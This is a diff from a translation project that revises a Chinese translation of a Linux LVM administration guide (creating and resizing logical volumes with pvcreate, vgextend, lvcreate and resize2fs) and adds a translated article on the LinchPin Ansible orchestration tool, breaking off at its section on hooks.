管理磁盘空间对系统管理员来说是一件重要的日常工作。因为磁盘空间耗尽而去启动一系列的耗时而又复杂的任务,来提升磁盘分区中可用的磁盘空间。它会要求系统离线。通常会涉及到安装一个新的硬盘、引导至恢复模式或者单用户模式、在新硬盘上创建一个分区和一个文件系统、挂载到临时挂载点去从一个太小的文件系统中移动数据到较大的新位置、修改 /etc/fstab 文件内容去反映出新分区的正确设备名、以及重新引导去重新挂载新的文件系统到正确的挂载点。
|
||||
管理磁盘空间对系统管理员来说是一件重要的日常工作。一旦磁盘空间耗尽就需要进行一系列耗时而又复杂的任务,以提升磁盘分区中可用的磁盘空间。它也需要系统离线才能处理。通常这种任务会涉及到安装一个新的硬盘、引导至恢复模式或者单用户模式、在新硬盘上创建一个分区和一个文件系统、挂载到临时挂载点去从一个太小的文件系统中移动数据到较大的新位置、修改 `/etc/fstab` 文件的内容来反映出新分区的正确设备名、以及重新引导来重新挂载新的文件系统到正确的挂载点。
|
||||
|
||||
我想告诉你的是,当 LVM (逻辑卷管理)首次出现在 Fedora Linux 中时,我是非常抗拒它的。我最初的反应是,我并不需要在我和我的设备之间有这种额外的抽象层。结果是我错了,逻辑卷管理是非常有用的。
|
||||
|
||||
LVM 让磁盘空间管理非常灵活。它提供的功能诸如在文件系统已挂载和活动时,很可靠地增加磁盘空间到一个逻辑卷和它的文件系统中,并且,它允许你将多个物理磁盘和分区融合进一个可以分割成逻辑卷的单个卷组中。
|
||||
LVM 让磁盘空间管理非常灵活。它提供的功能诸如在文件系统已挂载和活动时,很可靠地增加磁盘空间到一个逻辑卷和它的文件系统中,并且,它也允许你将多个物理磁盘和分区融合进一个可以分割成逻辑卷(LV)的单个卷组(VG)中。
|
||||
|
||||
卷管理也允许你去减少分配给一个逻辑卷的磁盘空间数量,但是,这里有两个要求,第一,卷必须是未挂载的。第二,在卷空间调整之前,文件系统本身的空间大小必须被减少。
|
||||
卷管理也允许你去减少分配给一个逻辑卷的磁盘空间数量,但是,这里有两个要求,第一,卷必须是未挂载的。第二,在卷空间调整之前,文件系统本身的空间大小必须先被减少。
|
||||
|
||||
有一个重要的提示是,文件系统本身必须允许重新调整大小的操作。当重新提升文件系统大小的时候,EXT2、3、和 4 文件系统都允许离线(未挂载状态)或者在线(挂载状态)重新调整大小。你应该去认真了解你打算去调整的文件系统的详细情况,去验证它们是否可以完全调整大小,尤其是否可以在线调整大小。
|
||||
有一个重要的提示是,文件系统本身必须允许重新调整大小的操作。当重新提升文件系统大小的时候,EXT2、3 和 4 文件系统都允许离线(未挂载状态)或者在线(挂载状态)重新调整大小。你应该去认真了解你打算去调整的文件系统的详细情况,去验证它们是否可以完全调整大小,尤其是否可以在线调整大小。
|
||||
|
||||
### 在使用中扩展一个文件系统
|
||||
### 即时扩展一个文件系统
|
||||
|
||||
在我安装一个新的发行版到我的生产用机器中之前,我总是喜欢在一个 VirtualBox 虚拟机中运行这个新的发行版一段时间,以确保它没有任何的致命的问题存在。在几年前的一个早晨,我在我的主要使用的工作站上的虚拟机中安装一个新发行的 Fedora 版本。我认为我有足够的磁盘空间分配给安装虚拟机的主文件系统。但是,我错了,大约在第三个安装时,我耗尽了我的文件系统的空间。幸运的是,VirtualBox 检测到了磁盘空间不足的状态,并且暂停了虚拟机,然后显示了一个明确指出问题所在的错误信息。
|
||||
在我安装一个新的发行版到我的生产用机器中之前,我总是喜欢在一个 VirtualBox 虚拟机中运行这个新的发行版一段时间,以确保它没有任何的致命的问题存在。在几年前的一个早晨,我在我的主要使用的工作站上的虚拟机中安装了一个新发行的 Fedora 版本。我认为我有足够的磁盘空间分配给安装虚拟机的主文件系统。但是,我错了,大约在安装到三分之一时,我耗尽了我的文件系统的空间。幸运的是,VirtualBox 检测到了磁盘空间不足的状态,并且暂停了虚拟机,然后显示了一个明确指出问题所在的错误信息。
|
||||
|
||||
请注意,这个问题并不是虚拟机磁盘太小造成的,而是由于宿主机上空间不足,导致虚拟机上的虚拟磁盘在宿主机上的逻辑卷中没有足够的空间去扩展。
|
||||
|
||||
因为许多现在的发行版都缺省使用了逻辑卷管理,并且在我的卷组中有一些可用的空余空间,我可以分配额外的磁盘空间到适当的逻辑卷,然后在使用中扩展宿主机的文件系统。这意味着我不需要去重新格式化整个硬盘,以及重新安装操作系统或者甚至是重启机器。我不过是分配了一些可用空间到适当的逻辑卷中,并且重新调整了文件系统的大小 — 所有的这些操作都在文件系统在线并且运行着程序的状态下进行的,虚拟机也一直使用着宿主机文件系统。在调整完逻辑卷和文件系统的大小之后,我恢复了虚拟机的运行,并且继续进行安装过程,就像什么问题都没有发生过一样。
|
||||
因为许多现在的发行版都缺省使用了逻辑卷管理,并且在我的卷组中有一些可用的空余空间,我可以分配额外的磁盘空间到适当的逻辑卷,然后即时扩展宿主机的文件系统。这意味着我不需要去重新格式化整个硬盘,以及重新安装操作系统或者甚至是重启机器。我不过是分配了一些可用空间到适当的逻辑卷中,并且重新调整了文件系统的大小 —— 所有的这些操作都在文件系统在线并且运行着程序的状态下进行的,虚拟机也一直使用着宿主机文件系统。在调整完逻辑卷和文件系统的大小之后,我恢复了虚拟机的运行,并且继续进行安装过程,就像什么问题都没有发生过一样。
|
||||
|
||||
虽然这种问题你可能从来也没有遇到过,但是,许多人都遇到过重要程序在运行过程中发生磁盘空间不足的问题。而且,虽然许多程序,尤其是 Windows 程序,并不像 VirtualBox 一样写的很好,且富有弹性,Linux 逻辑卷管理可以使它在不丢失数据的情况下去恢复,也不需要去进行耗时的安装过程。
|
||||
|
||||
### LVM 结构
|
||||
|
||||
逻辑卷管理的磁盘环境结构如下面的图 1 所示。逻辑卷管理允许多个单独的硬盘和/或磁盘分区组合成一个单个的卷组(VG)。卷组然后可以再划分为逻辑卷(LV)或者被用于分配成一个大的单一的卷。普通的文件系统,如EXT3 或者 EXT4,可以创建在一个逻辑卷上。
|
||||
逻辑卷管理的磁盘环境结构如下面的图 1 所示。逻辑卷管理允许多个单独的硬盘和/或磁盘分区组合成一个单个的卷组(VG)。卷组然后可以再划分为逻辑卷(LV)或者被用于分配成一个大的单一的卷。普通的文件系统,如 EXT3 或者 EXT4,可以创建在一个逻辑卷上。
|
||||
|
||||
在图 1 中,两个完整的物理硬盘和一个第三块硬盘的一个分区组合成一个单个的卷组。在这个卷组中创建了两个逻辑卷,和一个文件系统,比如,可以在每个逻辑卷上创建一个 EXT3 或者 EXT4 的文件系统。
|
||||
在图 1 中,两个完整的物理硬盘和一个第三块硬盘的一个分区组合成一个单个的卷组。在这个卷组中创建了两个逻辑卷和文件系统,比如,可以在每个逻辑卷上创建一个 EXT3 或者 EXT4 的文件系统。
|
||||
|
||||
![lvm.png](https://opensource.com/sites/default/files/resize/images/life-uploads/lvm-520x222.png)
|
||||
|
||||
_图 1: LVM 允许组合分区和整个硬盘到卷组中_
|
||||
_图 1: LVM 允许组合分区和整个硬盘到卷组中_
|
||||
|
||||
在一个主机上增加磁盘空间是非常简单的,在我的经历中,这种事情是很少的。下面列出了基本的步骤。你也可以创建一个完整的新卷组或者增加新的空间到一个已存在的逻辑卷中,或者创建一个新的逻辑卷。
|
||||
|
||||
### 增加一个新的逻辑卷
|
||||
|
||||
有时候需要在主机上增加一个新的逻辑卷。例如,在被提示包含我的 VirtualBox 虚拟机的虚拟磁盘的 /home 文件系统被填满时,我决定去创建一个新的逻辑卷,用于去存储虚拟机数据,包含虚拟磁盘。这将在我的 /home 文件系统中释放大量的空间,并且也允许我去独立地管理虚拟机的磁盘空间。
|
||||
有时候需要在主机上增加一个新的逻辑卷。例如,在被提示包含我的 VirtualBox 虚拟机的虚拟磁盘的 `/home` 文件系统被填满时,我决定去创建一个新的逻辑卷,以存储包含虚拟磁盘在内的虚拟机数据。这将在我的 `/home` 文件系统中释放大量的空间,并且也允许我去独立地管理虚拟机的磁盘空间。
|
||||
|
||||
增加一个新的逻辑卷的基本步骤如下:
|
||||
|
||||
1. 如有需要,安装一个新硬盘。
|
||||
|
||||
2. 可选 1: 在硬盘上创建一个分区
|
||||
|
||||
2. 可选: 在硬盘上创建一个分区。
|
||||
3. 在硬盘上创建一个完整的物理卷(PV)或者一个分区。
|
||||
|
||||
4. 分配新的物理卷到一个已存在的卷组(VG)中,或者创建一个新的卷组。
|
||||
|
||||
5. 从卷空间中创建一个新的逻辑卷(LV)。
|
||||
|
||||
6. 在新的逻辑卷中创建一个文件系统。
|
||||
|
||||
7. 在 /etc/fstab 中增加适当的条目以挂载文件系统。
|
||||
|
||||
7. 在 `/etc/fstab` 中增加适当的条目以挂载文件系统。
|
||||
8. 挂载文件系统。
|
||||
|
||||
为了更详细的介绍,接下来将使用一个示例作为一个实验去教授关于 Linux 文件系统的知识。
|
||||
|
||||
### 示例
|
||||
#### 示例
|
||||
|
||||
这个示例展示了怎么用命令行去扩展一个已存在的卷组,并给它增加更多的空间,在那个空间上创建一个新的逻辑卷,然后在逻辑卷上创建一个文件系统。这个过程一直在运行和挂载的文件系统上执行。
|
||||
这个示例展示了怎么用命令行去扩展一个已存在的卷组,并给它增加更多的空间,在那个空间上创建一个新的逻辑卷,然后在逻辑卷上创建一个文件系统。这个过程一直在运行着和已挂载的文件系统上执行。
|
||||
|
||||
警告:仅 EXT3 和 EXT4 文件系统可以在运行和挂载状态下调整大小。许多其它的文件系统,包括 BTRFS 和 ZFS 是不能这样做的。
|
||||
|
||||
### 安装硬盘
|
||||
##### 安装硬盘
|
||||
|
||||
如果在系统中现有硬盘上的卷组中没有足够的空间去增加,那么可能需要去增加一块新的硬盘,然后去创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。
|
||||
如果在系统中现有硬盘上的卷组中没有足够的空间可以增加,那么可能需要去增加一块新的硬盘,然后创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。
|
||||
|
||||
### 从硬盘上创建物理卷
|
||||
##### 从硬盘上创建物理卷
|
||||
|
||||
首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 /dev/hdd。
|
||||
首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 `/dev/hdd`。
|
||||
|
||||
```
|
||||
pvcreate /dev/hdd
|
||||
```
|
||||
|
||||
在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,以及另外的物理卷部分的元数据所使用的磁盘空间。
|
||||
在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的 Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,而且元数据所用的磁盘空间也能用做 PV 的一部分使用。
|
||||
|
||||
### 扩展已存在的卷组
|
||||
##### 扩展已存在的卷组
|
||||
|
||||
在这个示例中,我将扩展一个已存在的卷组,而不是创建一个新的;你可以选择其它的方式。在物理磁盘已经创建之后,扩展已存在的卷组(VG)去包含新 PV 的空间。在这个示例中,已存在的卷组命名为:MyVG01。
|
||||
|
||||
@ -88,7 +82,7 @@ pvcreate /dev/hdd
|
||||
vgextend /dev/MyVG01 /dev/hdd
|
||||
```
|
||||
|
||||
### 创建一个逻辑卷
|
||||
##### 创建一个逻辑卷
|
||||
|
||||
首先,在卷组中从已存在的空余空间中创建逻辑卷。下面的命令创建了一个 50 GB 大小的 LV。这个卷组的名字为 MyVG01,然后,逻辑卷的名字为 Stuff。
|
||||
|
||||
@ -96,7 +90,7 @@ vgextend /dev/MyVG01 /dev/hdd
|
||||
lvcreate -L +50G --name Stuff MyVG01
|
||||
```
|
||||
|
||||
### 创建文件系统
|
||||
##### 创建文件系统
|
||||
|
||||
创建逻辑卷并不会创建文件系统。这个任务必须被单独执行。下面的命令在新创建的逻辑卷中创建了一个 EXT4 文件系统。
|
||||
|
||||
@ -104,7 +98,7 @@ lvcreate -L +50G --name Stuff MyVG01
|
||||
mkfs -t ext4 /dev/MyVG01/Stuff
|
||||
```
|
||||
|
||||
### 增加一个文件系统卷标
|
||||
##### 增加一个文件系统卷标
|
||||
|
||||
增加一个文件系统卷标,更易于在文件系统以后出现问题时识别它。
|
||||
|
||||
@ -112,20 +106,78 @@ mkfs -t ext4 /dev/MyVG01/Stuff
|
||||
e2label /dev/MyVG01/Stuff Stuff
|
||||
```
|
||||
|
||||
### 挂载文件系统
|
||||
##### 挂载文件系统
|
||||
|
||||
在这个时候,你可以创建一个挂载点,并在 /etc/fstab 文件系统中添加合适的条目,以挂载文件系统。
|
||||
在这个时候,你可以创建一个挂载点,并在 `/etc/fstab` 文件系统中添加合适的条目,以挂载文件系统。
|
||||
|
||||
你也可以去检查并校验创建的卷是否正确。你可以使用 **df**、**lvs**、和 **vgs** 命令去做这些工作。
|
||||
你也可以去检查并校验创建的卷是否正确。你可以使用 `df`、`lvs` 和 `vgs` 命令去做这些工作。
|
||||
|
||||
### 在 LVM 文件系统中调整逻辑卷大小
|
||||
|
||||
从 Unix 的第一个版本开始,对文件系统的扩展需求就一直伴随,Linux 也不例外。随着有了逻辑卷管理(LVM),现在更加容易了。
|
||||
|
||||
1. 如有需要,安装一个新硬盘。
|
||||
2. 可选: 在硬盘上创建一个分区。
|
||||
3. 在硬盘上创建一个完整的物理卷(PV)或者一个分区。
|
||||
4. 分配新的物理卷到一个已存在的卷组(VG)中,或者创建一个新的卷组。
|
||||
5. 从卷空间中创建一个新的逻辑卷(LV),或者用卷组中部分或全部空间扩展已有的逻辑卷。
|
||||
6. 如果创建了新的逻辑卷,那么在上面创建一个文件系统。如果对已有的逻辑卷增加空间,使用 `resize2fs` 命令来增大文件系统来填满逻辑卷。
|
||||
7. 在 `/etc/fstab` 中增加适当的条目以挂载文件系统。
|
||||
8. 挂载文件系统。
|
||||
|
||||
|
||||
#### 示例
|
||||
|
||||
这个示例展示了怎么用命令行去扩展一个已存在的卷组。它会给 `/Stuff` 文件系统增加大约 50GB 的空间。这将生成一个可用于挂载的文件系统,在 Linux 2.6 内核(及更高)上可即时使用 EXT3 和 EXT4 文件系统。我不推荐你用于任何关键系统,但是这是可行的,我已经成功了好多次;即使是在根(`/`)文件系统上。是否使用自己把握风险。
|
||||
|
||||
警告:仅 EXT3 和 EXT4 文件系统可以在运行和挂载状态下调整大小。许多其它的文件系统,包括 BTRFS 和 ZFS 是不能这样做的。
|
||||
|
||||
##### 安装硬盘
|
||||
|
||||
如果在系统中现有硬盘上的卷组中没有足够的空间可以增加,那么可能需要去增加一块新的硬盘,然后创建空间增加到逻辑卷中。首先,安装物理硬盘,然后,接着执行后面的步骤。
|
||||
|
||||
##### 从硬盘上创建物理卷
|
||||
|
||||
首先需要去创建一个新的物理卷(PV)。使用下面的命令,它假设新硬盘已经分配为 `/dev/hdd`。
|
||||
|
||||
```
|
||||
pvcreate /dev/hdd
|
||||
```
|
||||
|
||||
在新硬盘上创建一个任意分区并不是必需的。创建的物理卷将被逻辑卷管理器识别为一个新安装的未处理的磁盘或者一个类型为 83 的 Linux 分区。如果你想去使用整个硬盘,创建一个分区并没有什么特别的好处,而且元数据所用的磁盘空间也能用做 PV 的一部分使用。
|
||||
|
||||
##### 增加物理卷到已存在的卷组
|
||||
|
||||
在这个示例中,我将使用一个新的物理卷来扩展一个已存在的卷组。在物理卷已经创建之后,扩展已存在的卷组(VG)去包含新 PV 的空间。在这个示例中,已存在的卷组命名为:MyVG01。
|
||||
|
||||
```
|
||||
vgextend /dev/MyVG01 /dev/hdd
|
||||
```
|
||||
|
||||
##### 扩展逻辑卷
|
||||
|
||||
首先,在卷组中从已存在的空余空间中创建逻辑卷。下面的命令创建了一个 50 GB 大小的 LV。这个卷组的名字为 MyVG01,然后,逻辑卷的名字为 Stuff。
|
||||
|
||||
```
|
||||
lvcreate -L +50G --name Stuff MyVG01
|
||||
```
|
||||
|
||||
##### 扩展文件系统
|
||||
|
||||
如果你使用了 `-r` 选项,扩展逻辑卷也将扩展其文件系统。如果你不使用 `-r` 选项,该操作需要单独执行。下面的命令在新调整大小的逻辑卷中调整了文件系统大小。
|
||||
|
||||
```
|
||||
resize2fs /dev/MyVG01/Stuff
|
||||
```
|
||||
|
||||
你也可以去检查并校验调整大小的卷是否正确。你可以使用 `df`、`lvs` 和 `vgs` 命令去做这些工作。
|
||||
|
||||
### 提示
|
||||
|
||||
过去几年来,我学习了怎么去做让逻辑卷管理更加容易的一些知识,希望这些提示对你有价值。
|
||||
|
||||
* 除非你有一个明确的原因去使用其它的文件系统外,推荐使用可扩展的文件系统。除了 EXT2、3、和 4 外,并不是所有的文件系统都支持调整大小。EXT 文件系统不但速度快,而且它很高效。在任何情况下,如果默认的参数不能满足你的需要,它们(指的是文件系统参数)可以通过一位知识丰富的系统管理员来调优它。
|
||||
|
||||
* 使用有意义的卷和卷组名字。
|
||||
|
||||
* 使用 EXT 文件系统标签
|
||||
|
||||
我知道,像我一样,大多数的系统管理员都抗拒逻辑卷管理。我希望这篇文章能够鼓励你至少去尝试一个 LVM。如果你能那样做,我很高兴;因为,自从我使用它之后,我的硬盘管理任务变得如此的简单。
|
||||
@ -133,9 +185,9 @@ e2label /dev/MyVG01/Stuff Stuff
|
||||
|
||||
### 关于作者
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10]
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10]
|
||||
|
||||
David Both - 是一位 Linux 和开源软件的倡导者,住在 Raleigh, North Carolina。他在 IT 行业工作了 40 多年,在 IBM 工作了 20 多年。在 IBM 期间,他在 1981 年为最初的 IBM PC 编写了第一个培训课程。他曾教授红帽的 RHCE 课程,并在 MCI Worldcom、Cisco和 North Carolina 工作。他已经使用 Linux 和开源软件工作了将近 20 年。... [more about David Both][7][More about me][8]
|
||||
David Both 是一位 Linux 和开源软件的倡导者,住在 Raleigh, North Carolina。他在 IT 行业工作了 40 多年,在 IBM 工作了 20 多年。在 IBM 期间,他在 1981 年为最初的 IBM PC 编写了第一个培训课程。他曾教授红帽的 RHCE 课程,并在 MCI Worldcom、Cisco 和 North Carolina 工作。他已经使用 Linux 和开源软件工作了将近 20 年。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
@ -143,7 +195,7 @@ via: https://opensource.com/business/16/9/linux-users-guide-lvm
|
||||
|
||||
作者:[David Both](a)
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,374 @@
|
||||
LinchPin:一个使用 Ansible 的简化的编配工具
|
||||
============================================================
|
||||
|
||||
> 2016 年末开始的 LinchPin,现在已经拥有一个 Python API 和一个成长中的社区。
|
||||
|
||||
![LinchPin 1.0:一个使用 Ansible 的成熟的混合云编配工具](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/toolbox-learn-draw-container-yearbook.png?itok=xDbwz1pP "LinchPin 1.0: A maturing hybrid cloud orchestration tool using Ansible")
|
||||
|
||||
>Image by : [Internet Archive Book Images][10]. Modified by Opensource.com. CC BY-SA 4.0
|
||||
|
||||
去年,[我的团队公布了][11] [LinchPin][12],这是一个使用 Ansible 的混合云<ruby>编配<rt>orchestration</rt></ruby>工具。<ruby>配给<rt>provision</rt></ruby>云资源从来没有这么容易便捷过。借助 Ansible 强力支持,LinchPin 专注于简化,使云资源让用户可以触手可及。在这篇文章中,我将介绍 LinchPin,并且去看看过去的 10 个月该项目是如何逐渐成熟。
|
||||
|
||||
(LCTT 译注:关于 orchestration 应该翻译成惯例的“编排”还是“编配”,有个 @wffger 提出的[建议](https://github.com/LCTT/TranslateProject/issues/6715) ,欢迎大家参与讨论。)
|
||||
|
||||
LinchPin 刚出现的时候,使用 `ansible-playbook` 命令去运行 LinchPin ,虽然可以完成,但是还是很复杂的,LinchPin 现在有一个前端命令行用户界面(CLI),它是用 [Click][14] 写的,而且它使 LinchPin 比以前更简化。
|
||||
|
||||
没有止步于 CLI,LinchPin 现在还有一个 [Python][15] API,它可以用于管理资源,比如,Amazon EC2 和 OpenStack 实例、网络、存储、安全组等等。这个 API [文档][16] 可以在你想去尝试 LinchPin 的 Python API 时帮助你。
|
||||
|
||||
### Playbook 是一个库
|
||||
|
||||
因为 LinchPin 的核心是 [Ansible playbook][17],其角色、模块、过滤器,以及任何被称为 Ansible 模块的东西都被移进 LinchPin 库中,这意味着我们虽然可以直接调用 playbook,但它不是资源管理的首选机制。`linchpin` 可执行文件事实上已经成为该命令行的前端。
|
||||
|
||||
### 深入了解命令行
|
||||
|
||||
让我们深入了解 `linchpin` 命令行:
|
||||
|
||||
```
|
||||
$ linchpin
|
||||
Usage: linchpin [OPTIONS] COMMAND [ARGS]...
|
||||
|
||||
linchpin: hybrid cloud orchestration
|
||||
|
||||
Options:
|
||||
-c, --config PATH Path to config file
|
||||
-w, --workspace PATH Use the specified workspace if the familiar Jenkins
|
||||
$WORKSPACE environment variable is not set
|
||||
-v, --verbose Enable verbose output
|
||||
--version Prints the version and exits
|
||||
--creds-path PATH Use the specified credentials path if WORKSPACE
|
||||
environment variable is not set
|
||||
-h, --help Show this message and exit.
|
||||
|
||||
Commands:
|
||||
init Initializes a linchpin project.
|
||||
up Provisions nodes from the given target(s) in...
|
||||
destroy Destroys nodes from the given target(s) in...
|
||||
```
|
||||
|
||||
你可以立即看到一个简单的描述,以及命令的选项和参数。这个帮助的最下面的三个命令是本文的重点内容。
|
||||
|
||||
#### 配置文件
|
||||
|
||||
之前有个名为 `linchpin_config.yml` 的文件。但现在这个文件没有了,替换它的是一个 ini 形式的配置文件,称为 `linchpin.conf`。虽然这个文件可以被修改或放到别的地方,它可以放置在配置文件容易找到的库路径中。在多数情况下,`linchpin.conf` 文件是不需要去修改的。
|
||||
|
||||
#### 工作空间
|
||||
|
||||
<ruby>工作空间<rt>workspace</rt></ruby>是一个定义好的文件系统路径,它是一个逻辑上的资源组。一个工作空间可以认为是一个特定环境、服务组、或其它逻辑组的一个单点。它也可以是一个所有可管理资源的大的存储容器。
|
||||
|
||||
工作空间可以在命令行上使用 `--workspace` (`-w`) 选项去指定,随后是工作空间路径。它也可以使用环境变量指定(比如,bash 中的 `$WORKSPACE`)。默认工作空间是当前目录。
|
||||
|
||||
#### 初始化 (`linchpin init`)
|
||||
|
||||
运行 `linchpin init` 将生成一个需要的目录结构,以及一个 `PinFile`、`topology`、和 `layout` 文件的示例:
|
||||
|
||||
```
|
||||
$ export WORKSPACE=/tmp/workspace
|
||||
$ linchpin init
|
||||
PinFile and file structure created at /tmp/workspace
|
||||
$ cd /tmp/workspace/
|
||||
$ tree
|
||||
.
|
||||
├── credentials
|
||||
├── hooks
|
||||
├── inventories
|
||||
├── layouts
|
||||
│ └── example-layout.yml
|
||||
├── PinFile
|
||||
├── resources
|
||||
└── topologies
|
||||
└── example-topology.yml
|
||||
```
|
||||
|
||||
在这个时候,可以执行 `linchpin up` ,然后提供一个 `libvirt` 虚拟机,和一个名为 `linchpin-centos71` 的网络。会生成一个<ruby>库存<rt>inventory</rt></ruby>,并放在 `inventories/libvirt.inventory` 目录中。它可以通过读取 `topologies/example-topology.yml` 和 `topology_name` 的值了解它。
|
||||
|
||||
#### <ruby>配给<rt>provisioning</rt></ruby> (`linchpin up`)
|
||||
|
||||
一旦有了一个 PinFile、拓扑、和一个可选的布局,就可以<ruby>配给<rt>provisioning</rt></ruby>了。
|
||||
|
||||
我们使用 dummy (模拟)工具,因为用它来配给非常简单;它不需要任何额外的东西(认证、网络、等等)。dummy 配给程序会创建一个临时文件,它表示所配给的主机。如果临时文件没有任何数据,说明主机没有被配给,或者它已经被销毁了。
|
||||
|
||||
dummy 配给程序的目录树大致如下:
|
||||
|
||||
```
|
||||
$ tree
|
||||
.
|
||||
├── hooks
|
||||
├── inventories
|
||||
├── layouts
|
||||
│ └── dummy-layout.yml
|
||||
├── PinFile
|
||||
├── resources
|
||||
└── topologies
|
||||
└── dummy-cluster.yml
|
||||
```
|
||||
|
||||
PinFile 也很简单;它指定了它的拓扑,并且为 `dummy1` 目标提供一个可选的布局:
|
||||
|
||||
```
|
||||
---
|
||||
dummy1:
|
||||
topology: dummy-cluster.yml
|
||||
layout: dummy-layout.yml
|
||||
```
|
||||
|
||||
`dummy-cluster.yml` 拓扑文件是一个引用,指向到配给的三个 `dummy_node` 类型的资源:
|
||||
|
||||
```
|
||||
---
|
||||
topology_name: "dummy_cluster" # topology name
|
||||
resource_groups:
|
||||
-
|
||||
resource_group_name: "dummy"
|
||||
resource_group_type: "dummy"
|
||||
resource_definitions:
|
||||
-
|
||||
name: "web"
|
||||
type: "dummy_node"
|
||||
count: 3
|
||||
```
|
||||
|
||||
执行命令 `linchpin up` 将基于上面的 `topology_name`(在这个案例中是 `dummy_cluster`)生成 `resources` 和 `inventory` 文件。
|
||||
|
||||
```
|
||||
$ linchpin up
|
||||
target: dummy1, action: up
|
||||
|
||||
$ ls {resources,inventories}/dummy*
|
||||
inventories/dummy_cluster.inventory resources/dummy_cluster.output
|
||||
```
|
||||
|
||||
要验证 dummy 集群的资源,可以检查 `/tmp/dummy.hosts`:
|
||||
|
||||
```
|
||||
$ cat /tmp/dummy.hosts
|
||||
web-0.example.net
|
||||
web-1.example.net
|
||||
web-2.example.net
|
||||
```
|
||||
|
||||
Dummy 模块为假定的(或模拟的)配给提供了一个基本工具。关于在 OpenStack、AWS EC2、Google Cloud 上和 LinchPin 的更多详细情况,可以去看[示例][18]。
|
||||
|
||||
#### <ruby>库存<rt>inventory</rt></ruby>生成
|
||||
|
||||
作为上面提到的 PinFile 的一部分,可以指定一个 `layout`。如果这个文件被指定,并且放在一个正确的位置上,就会为配给的资源自动生成一个用于 Ansible 的静态<ruby>库存<rt>inventory</rt></ruby>文件:
|
||||
|
||||
```
|
||||
---
|
||||
inventory_layout:
|
||||
vars:
|
||||
hostname: __IP__
|
||||
hosts:
|
||||
example-node:
|
||||
count: 3
|
||||
host_groups:
|
||||
- example
|
||||
```
|
||||
|
||||
当 `linchpin up` 运行完成,资源文件将提供一个很有用的详细信息。特别是,插入到静态库存的 IP 地址或主机名:
|
||||
|
||||
```
|
||||
[example]
|
||||
web-2.example.net hostname=web-2.example.net
|
||||
web-1.example.net hostname=web-1.example.net
|
||||
web-0.example.net hostname=web-0.example.net
|
||||
|
||||
[all]
|
||||
web-2.example.net hostname=web-2.example.net
|
||||
web-1.example.net hostname=web-1.example.net
|
||||
web-0.example.net hostname=web-0.example.net
|
||||
```
|
||||
|
||||
#### 卸载 (`linchpin destroy`)
|
||||
|
||||
LinchPin 也可以执行资源卸载。卸载动作一般认为该资源是已经配给好的;然而,因为 Ansible 是<ruby>幂等的<rt>idempotent</rt></ruby>,`linchpin destroy` 将仅检查确认该资源是启用的。如果这个资源已经是启用的,它将去卸载它。
|
||||
|
||||
命令 `linchpin destroy` 也将使用资源和/或拓扑文件去决定合适的卸载过程。
|
||||
|
||||
Ansible `dummy` 角色不使用资源,卸载期间仅有拓扑:
|
||||
|
||||
```
|
||||
$ linchpin destroy
|
||||
target: dummy1, action: destroy
|
||||
|
||||
$ cat /tmp/dummy.hosts
|
||||
-- EMPTY FILE --
|
||||
```
|
||||
|
||||
针对暂时的资源,卸载功能有一些限制,像网络、存储、等等。网络资源可以被用于多个云实例。在这种情况下,执行一个 `linchpin destroy` 某些资源就不能卸载。这取决于每个供应商的实现。查看每个[供应商][19]的具体实现。
|
||||
|
||||
### LinchPin 的 Python API
|
||||
|
||||
在 `linchpin` 命令行中实现的功能大多数都是用 Python API 写的。这个 API,虽然不完整,但它已经成为 LinchPin 工具的至关重要的组件。
|
||||
|
||||
这个 API 由下面的三个包组成:
|
||||
|
||||
* `linchpin`
|
||||
* `linchpin.cli`
|
||||
* `linchpin.api`
|
||||
|
||||
该命令行工具是基于 `linchpin` 包来管理的。它导入了 `linchpin.cli` 模块和类,该类是 `linchpin.api` 的子类。这样做的目的是为了允许使用 `linchpin.api` 来做其它的 LinchPin 实现,比如像计划中的 RESTful API。
|
||||
|
||||
更多信息,去查看 [Python API library documentation on Read the Docs][20]。
|
||||
|
||||
### Hook
|
||||
|
||||
LinchPin 1.0 的其中一个大的变化是转向 hook。hook 的目标是在 `linchpin` 运行期间的特定状态下,允许配置使用更多外部资源。目前的状态有:
|
||||
|
||||
* `preup`: 在配给拓扑资源之前运行
|
||||
* `postup`: 在配给拓扑资源之后运行,并且生成可选的<ruby>库存<rt>inventory</rt></ruby>
|
||||
* `predestroy`: 卸载拓扑资源之前运行
|
||||
* `postdestroy`: 卸载拓扑资源之后运行
|
||||
|
||||
在每种状态下,这些 hooks 允许运行外部脚本。存在几种类型的 hook,包括一个定制的叫做 _Action Managers_。这是一个内置的 Action Manager 的列表:
|
||||
|
||||
* `shell`: 允许任何的<ruby>内联<rt>inline</rt></ruby>的 shell 命令,或者一个可运行的 shell 脚本
|
||||
* `python`: 运行一个 Python 脚本
|
||||
* `ansible`: 运行一个 Ansible playbook,允许传递一个 `vars_file` 和 `extra_vars` 作为 Python 字典
|
||||
* `nodejs`: 运行一个 Node.js 脚本
|
||||
* `ruby`: 运行一个 Ruby 脚本
|
||||
|
||||
hook 被绑定到一个特定的目标,并且每个目标使用时必须重新声明。将来,hook 将可能是全局的,然后它们在每个目标的 `hooks` 节下命名会更简单。
|
||||
|
||||
#### 使用 hook
|
||||
|
||||
